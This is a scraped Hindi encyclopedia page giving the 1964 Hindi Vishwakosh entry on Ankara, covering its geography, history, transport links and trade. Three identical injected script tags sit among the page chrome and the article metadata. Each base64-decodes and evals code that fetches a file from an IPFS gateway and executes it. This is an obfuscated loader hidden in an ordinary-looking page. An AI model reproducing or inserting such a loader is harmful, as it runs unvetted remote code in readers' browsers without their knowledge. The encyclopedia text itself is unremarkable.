अंकारा

अद्‌भुत भारत की खोज
नेविगेशन पर जाएँ खोज पर जाएँ
The printable version is no longer supported and may have rendering errors. Please update your browser bookmarks and please use the default browser print function instead.
गणराज्य इतिहास पर्यटन भूगोल विज्ञान कला साहित्य धर्म संस्कृति शब्दावली विश्वकोश भारतकोश

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

चित्र:Tranfer-icon.png यह लेख परिष्कृत रूप में भारतकोश पर बनाया जा चुका है। भारतकोश पर देखने के लिए यहाँ क्लिक करें

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

लेख सूचना
अंकारा
पुस्तक नाम हिन्दी विश्वकोश खण्ड 1
पृष्ठ संख्या 06
भाषा हिन्दी देवनागरी
संपादक सुधाकर पाण्डेय
प्रकाशक नागरी प्रचारणी सभा वाराणसी
मुद्रक नागरी मुद्रण वाराणसी
संस्करण सन्‌ 1964 ईसवी
उपलब्ध भारतडिस्कवरी पुस्तकालय
कॉपीराइट सूचना नागरी प्रचारणी सभा वाराणसी
लेख सम्पादक श्री ललित किशोर सिंह चौधरी

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

अंकारा तुर्की (टर्की) की राजधानी है। इसकी स्थिति: 390 57' उत्तरी अक्षांश और 320 53' पूर्वी देशांतर है। अंकारा नगर तुर्की के मध्यवर्ती पठार के उत्तरी भाग के मध्य में, निकटवर्ती क्षेत्र से 500 फ़ुट ऊँची पहाड़ी पर, स्थित है। इस नगर का धरातल समुद्र तल से 2,854 फ़ुट की ऊँचाई पर है। यह सकरया नदी की सहायक अंकारा नदी के बाएँ किनारे पर इस्तंबूल से 352 कि.मी. पूर्व की ओर है।

इतिहास

प्राचीन काल में यह मध्य पठार के उत्तरी क्षेत्र की राजधानी था। सन्‌ 1922 में मुस्तफा कमाल पाशा के नेतृत्व में एक क्रांति हुई और राजधानी इस्तंबूल से अंकारा लाई गई, जो तुर्की के मध्य में पड़ता है और सुरक्षा की दृष्टि से अपेक्षाकृत उत्तम स्थिति में है। यह तुर्की का दूसरा बड़ा शहर है। बगदाद संधि संगठन वाले देशों का प्रमुख कार्यालय यहीं है।

अन्य देशों से सम्पर्क

अंकारा रेलों का केंद्र है। रेल द्वारा यह तुर्की के अन्य प्रमुख नगरों थे, उदाहरणत: - जान गुलडक, केसरी, अदाना, इस्तंबूल तथा इज़मिर से मिला है। हवाई मार्ग इसे तेहरान, बेरूत और लंदन से मिलाते हैं।

खनिर तथा व्यापार

अंकारा के आसपास के क्षेत्रों में चाँदी, ताँबा, लिगनाइट, कोयला तथा नमक पाया जाता है। यह समीपस्थ जंगलों, चरागाहों और खेतों की उपजों के व्यापार का प्रमुख केंद्र है। यहाँ के पठार के अंगोरा बकरा जगत्प्रसिद्ध है। देश के औद्योगिक विकास के साथ-साथ यहाँ भी कई नए कारखाने खुले हैं, जिनमें कपड़े के मिलें, ऊनी कालीन, इंजीनियरिंग के सामान, हथियार, तंबाकू तथा सिगरेट के कारखाने मुख्य हैं। अंकारा एक बड़ा बाजार है। यहाँ ऊन, मोहेअर (अंगोरा बकरे का ऊन), अनाज, फल, शहद, चमड़ा तथा कालीन का व्यापार होता है।

टीका टिप्पणी और संदर्भ